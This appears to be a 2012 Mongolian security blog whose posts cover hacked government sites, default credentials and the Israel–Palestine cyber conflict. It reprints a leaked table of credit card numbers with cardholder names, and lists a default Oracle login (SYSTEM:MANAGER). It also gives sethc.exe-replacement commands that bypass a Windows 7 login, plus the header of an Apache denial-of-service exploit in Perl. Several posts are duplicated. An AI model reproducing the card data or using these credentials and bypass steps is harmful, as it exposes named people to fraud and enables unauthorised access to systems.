Top 500 Supercomputer жилд 2 удаа буюу 6, 11 саруудад лист ээ шинэчилдэг билээ. Хуваарь ёсоор энэ сарын лист шинэчлэгдсэн байна. Энэхүү Supercomputer уудын ач тус асар их юм. Жишээ нь: Генийн дарааллыг тооцоолох, Физикийн Туршилтууд, NASA, Анагаах гэх мэт асар их тооцоо бодолтууд шаардсан зүйлд ашиглагдсаар байна. Мөн том гүрнүүдийн далд өрсөлдөөнийг ч харуулдаг. Өнгөрсөн 2011.11 сард эхний тавд China 2, Japan 2 Supercomputer байсныг хараад гайхаж билээ.
Энэ жил Америкчууд тэргүүллээ эргүүлэн авч чаджээ.
Tuesday, November 27, 2012
Monday, November 26, 2012
Default Oracle Accounts
Манайд Oracle DB ийг нилээд хэрэглэдэг болжээ. DB админууд иймэрхүү жижиг зүйлсийг орхигдуулахвий л гэж үүнийг оруулав.
username: password
SYSTEM:MANAGER
Thursday, November 22, 2012
Хэлсэн ёсоор болов !!!
Төрийн вэбүүдийг үзээд аюулгүй байдал гэж хөөрхийлөлтэй байна гэж хэлж дуусаагүй байтал Эрүүл Мэндийн Яам Хакердуулчих юм аа. Ер нь Туркууд монголруу их халдлага хийдэг тэрний нэг хэсэг болов.
Өнөөдөр эрүүл мэндтэй холбоотой хэд хэдэн вэб хакердуулчих юм. Харамсалтай.
http://sbne.ubhealth.mn/
http://english.moh.mn/
Өнөөдөр эрүүл мэндтэй холбоотой хэд хэдэн вэб хакердуулчих юм. Харамсалтай.
http://sbne.ubhealth.mn/
http://english.moh.mn/
SNMP түлхүүр үгээ солиоч ээ !!!
1,2 жилийн өмнө монголын ISP үүдийн snmp түлхүүр үгийг шалгахад ер нь default л байсан одоо ч хэвээрээ л байх юм. Үүнийг одоо сольчиж болдоггүй л юм байхдаа. Тэгээд л хамаг route, mac address, traffic, router information, switch information гэх мэдээллээ ил гаргаад байж байх нь таалагддаг гэж үү? Энэ нь аюулгүй байдалд тийм ч их нөлөө үзүүлэхгүй гэж бодсоор л байх юм. Гэхдээ яаг шууд учирах аюул ихгүй байж мэдэх ч дээр дурдсан мэдээллийг цуглуулснаар дараагийн арга хэрэгсэл ашиглаж илүү ноцтой хохирол учируулж болно шүү дээ.
Жишээ болгож: Холбоо Мэдээллийн Дээд Сургуулийн төв router ийн талаар мэдээлэл оруульяа.Энэ бол хак инээ тэрээ биш шүү сүлжээний мэдлэгтэй хэнч доорх мэдээллийг гаргачих юм.
Жишээ болгож: Холбоо Мэдээллийн Дээд Сургуулийн төв router ийн талаар мэдээлэл оруульяа.Энэ бол хак инээ тэрээ биш шүү сүлжээний мэдлэгтэй хэнч доорх мэдээллийг гаргачих юм.
Tuesday, November 20, 2012
Израиль хариу арга хэмжээ авав
Ойрд Газын зурвас орчимоор кибер дайн хүчтэй өрнөсөөр байна. Палестин болон Израилын талууд кибер орчинд хүчээ харуулсаар.
Израилийн хакерууд Палестины ISP \www.palnet.ps\ ийн кредит картны мэдээллийг задлав.
Card_Number Email Exp_Date ID Name_on_Card VisaUID
4088-1326 NULL 01/01/2013 00:00 NULL Mustafa Abu Sway 70071
4263-9300-0164-5839 NULL 01/07/2013 00:00 NULL Peter Cardy 61564
4940-7440-1000-9304 NULL 01/08/2003 00:00 NULL Mohd A. A. Shkukani 3366
4346-0178 NULL 01/08/2003 00:00 NULL Jamal Kafiety 60991
5326-1003-1479-7493 NULL 01/06/2011 00:00 NULL Samir Khatib 4573
4580-9901-0005-3034 NULL 01/05/2003 00:00 NULL Nader Dajani 2312
4551-2100-2978-7397 NULL 01/02/2003 00:00 NULL Amelia T. Peltz 59518
4580-0901--0610-7940 NULL 01/01/2003 00:00 NULL Sani Meo 4166
3514-7113 NULL 01/02/2013 00:00 NULL Radi Qirresh 59813
Израилийн хакерууд Палестины ISP \www.palnet.ps\ ийн кредит картны мэдээллийг задлав.
Card_Number Email Exp_Date ID Name_on_Card VisaUID
4088-1326 NULL 01/01/2013 00:00 NULL Mustafa Abu Sway 70071
4263-9300-0164-5839 NULL 01/07/2013 00:00 NULL Peter Cardy 61564
4940-7440-1000-9304 NULL 01/08/2003 00:00 NULL Mohd A. A. Shkukani 3366
4346-0178 NULL 01/08/2003 00:00 NULL Jamal Kafiety 60991
5326-1003-1479-7493 NULL 01/06/2011 00:00 NULL Samir Khatib 4573
4580-9901-0005-3034 NULL 01/05/2003 00:00 NULL Nader Dajani 2312
4551-2100-2978-7397 NULL 01/02/2003 00:00 NULL Amelia T. Peltz 59518
4580-0901--0610-7940 NULL 01/01/2003 00:00 NULL Sani Meo 4166
3514-7113 NULL 01/02/2013 00:00 NULL Radi Qirresh 59813
Израиль халдлагад өртөв
Ойрд Israel руу яагаад халдлага хийх болов.
Саяхан Израилийг дэмжигч 3000 орчим Америкийн сенаторын нэр, гэрийн хаяг, утасны дугаар, ажил гэх мэт мэдээллийг элчилсэн. Одоо болохоор Израилийн 660 орчим вэбийг байгаа болгосон байна. Үүнийг AnonymousGrupo гэх бүлэг хийсэн ба хальт харвал Anonymous гэж андуурагдаж байна лээ. Иймэрхүү том бүлэглэлүүдийн хувьд тухайн вэбийг ямар технологи дээр хийсэн нь падлийгүй бололтой. Халдлагад өртсөн вэбүүдээс сонирхож үзвэл төрөл бүрийн технологи дээр хийгдсэн байна. Гэхдээ бүр нарийн үзвэл ихэнх нь нэг сервер дээр байрлах ба аль нэг муу хийгдсэн вэбээр дамжин бусад вэбүүдээ аюулд оруулсан байх магадлалтай л гэж хувьдаа бодож байна. .
http://newdiet.allbiz.co.il/
http://www.allbiz.co.il/
http://acting.co.il/
http://activesport.allbiz.co.il/
http://adifim.allbiz.co.il/
Саяхан Израилийг дэмжигч 3000 орчим Америкийн сенаторын нэр, гэрийн хаяг, утасны дугаар, ажил гэх мэт мэдээллийг элчилсэн. Одоо болохоор Израилийн 660 орчим вэбийг байгаа болгосон байна. Үүнийг AnonymousGrupo гэх бүлэг хийсэн ба хальт харвал Anonymous гэж андуурагдаж байна лээ. Иймэрхүү том бүлэглэлүүдийн хувьд тухайн вэбийг ямар технологи дээр хийсэн нь падлийгүй бололтой. Халдлагад өртсөн вэбүүдээс сонирхож үзвэл төрөл бүрийн технологи дээр хийгдсэн байна. Гэхдээ бүр нарийн үзвэл ихэнх нь нэг сервер дээр байрлах ба аль нэг муу хийгдсэн вэбээр дамжин бусад вэбүүдээ аюулд оруулсан байх магадлалтай л гэж хувьдаа бодож байна. .
http://newdiet.allbiz.co.il/
http://www.allbiz.co.il/
http://acting.co.il/
http://activesport.allbiz.co.il/
http://adifim.allbiz.co.il/
Sunday, November 18, 2012
Мэдээллээ нуух боломж байна уу?
Саяхан хэсэг нэт ухаж байгаад дараах мэдээллийг олов. Орост кибер довтолгооны үйлчилгээ аль хэдийн дэлгэрч үнэ ханш нь тогтсон байх юм.
Ингээд харахад ер нь хүссэн мэдээллээ олох, хүссэн байгууллагын сүлжээг доголдуулахад тийм ч их мөнгө төлөхөөргүй л харагдаж байна. Яаг эсрэгээрээ буюу тухайн байгууллагын аюулгүй байдлыг хангаж буй өндөр зэрэглэлийн мэргэжилтэнүүд, тоног төхөөрөмжүүдэд зарж буй мөнгө үүнээс хэдэн зуу дахин их шүү дээ. Үүнийн харьцаа тийм ч бодит биш харагдаад байх юм.
Ингээд харахад ер нь хүссэн мэдээллээ олох, хүссэн байгууллагын сүлжээг доголдуулахад тийм ч их мөнгө төлөхөөргүй л харагдаж байна. Яаг эсрэгээрээ буюу тухайн байгууллагын аюулгүй байдлыг хангаж буй өндөр зэрэглэлийн мэргэжилтэнүүд, тоног төхөөрөмжүүдэд зарж буй мөнгө үүнээс хэдэн зуу дахин их шүү дээ. Үүнийн харьцаа тийм ч бодит биш харагдаад байх юм.
Thursday, November 15, 2012
Төрийн вэбүүд !!!
Төрийн байгууллагуудын вэбүүдийг сонирхож үзэв. Гэтэл ихэнх нь Joomla байх юм. Хөрөнгө мөнгөгүй гээд нэг хэсэг нээлттэй эх гэдэг л байсан одоо үүнийг өөрчлөмөөр л байгаам даа.
Ер нь тэгээд ч эдгээр газруудын имэйл ч асуудалтай биз. Сүлжээгээр дамжуулалт хийхдээ enryption технологи, SSL, TLS ашигладаг гэж бодохгүй л байна. Тухайн нэг серверийн сул талаас шалтгаалж сүлжээнээс орчны бүх мэдээллээ алдах, сүлжээний урсгалаа шүүлгүүлэх гэх мэт асуудал гарч мэдэхээр л юм.
Ер нь тэгээд ч эдгээр газруудын имэйл ч асуудалтай биз. Сүлжээгээр дамжуулалт хийхдээ enryption технологи, SSL, TLS ашигладаг гэж бодохгүй л байна. Тухайн нэг серверийн сул талаас шалтгаалж сүлжээнээс орчны бүх мэдээллээ алдах, сүлжээний урсгалаа шүүлгүүлэх гэх мэт асуудал гарч мэдэхээр л юм.
Bug Bounty Хөтөлбөр
Энэ нь ирээдүйд ирж болох алдагдлаас хамгаалсан аюулгүй байдлын сул талаа олж илрүүлүүлэх зорилгоор Google, Facebook тэргүүтэй том компаниудын гаргасан хөтөлбөр гэдэг. Та манай сул талыг олж бидэнд мэдээл бид шагнал өгнө гэсэн утгатай.
Google ийн хувьд:
-Remote code execution = $5,000 - $20,000
-SQLi = $5,000 - $10,000
-Мэдээлэл алдагдах = $500-$10,000
-XSS,XSRF, XSSI, болон бусад нийтлэг вебийн алдаа = $100-$3,133.7
Google ийн хувьд:
-Remote code execution = $5,000 - $20,000
-SQLi = $5,000 - $10,000
-Мэдээлэл алдагдах = $500-$10,000
-XSS,XSRF, XSSI, болон бусад нийтлэг вебийн алдаа = $100-$3,133.7
Wednesday, November 14, 2012
Apache kill \DDOS\ attack
Энд Apache aa update хийдэггүй болон сайн тохируулдаггүй вэбүүдийг чангалах exploit орууллаа. Үүнийг харсан нь хамгаалалтаа хийнэ биз. Ер нь тэгээд манай вэбүүдийн ихэнх нь энэ exploit ийн эсрэг хамгаалалт гэж алга.
Шалгасан вэбүүдийн жагсаалтыг энд оруулсаар байх юм.
#!/usr/bin/perl -w
# Exploit Title: Apache Server Denial of Service exploit (DDOS)
# Author: Tatar
# Version: 2.3.14 and older
# Tested on: CentOs
Шалгасан вэбүүдийн жагсаалтыг энд оруулсаар байх юм.
#!/usr/bin/perl -w
# Exploit Title: Apache Server Denial of Service exploit (DDOS)
# Author: Tatar
# Version: 2.3.14 and older
# Tested on: CentOs
Monday, November 12, 2012
Ipv6 ийн талаар
2011 онд Busan д болсон APNIC 32 Conference д оролцоод IPv6 ийн талаар нилээд мэдээлэлтэй болсон юм. Иймд тухайн мэдээллийг хуваалцахаар доорх ppt ийг бэлдсэнээ сонирхуульяа. Нэмж тайлбар хийвэл баярлах болно.
https://www.dropbox.com/s/y2yoreizzdn14hc/IPv6.pptx
Sunday, November 11, 2012
Hack to Windows 7.0 Login Password
\Login user: Admin гэж үзье.\
1. Windows 7.0 Install CD ээ уншуулж Repair Your Computer сонголтыг сонгоно.
2. Command Prompt ийг сонгож нээнэ.
3. copy C:\windows\system32\sethc.exe C:\ гэсэн тушаалыг өгч sethc.exe файлыг нөөцөлж авна.
4. copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe тушаалыг өгч sethc.exe файлыг дарж хуулна.
1. Windows 7.0 Install CD ээ уншуулж Repair Your Computer сонголтыг сонгоно.
2. Command Prompt ийг сонгож нээнэ.
3. copy C:\windows\system32\sethc.exe C:\ гэсэн тушаалыг өгч sethc.exe файлыг нөөцөлж авна.
4. copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe тушаалыг өгч sethc.exe файлыг дарж хуулна.
Subscribe to:
Posts (Atom)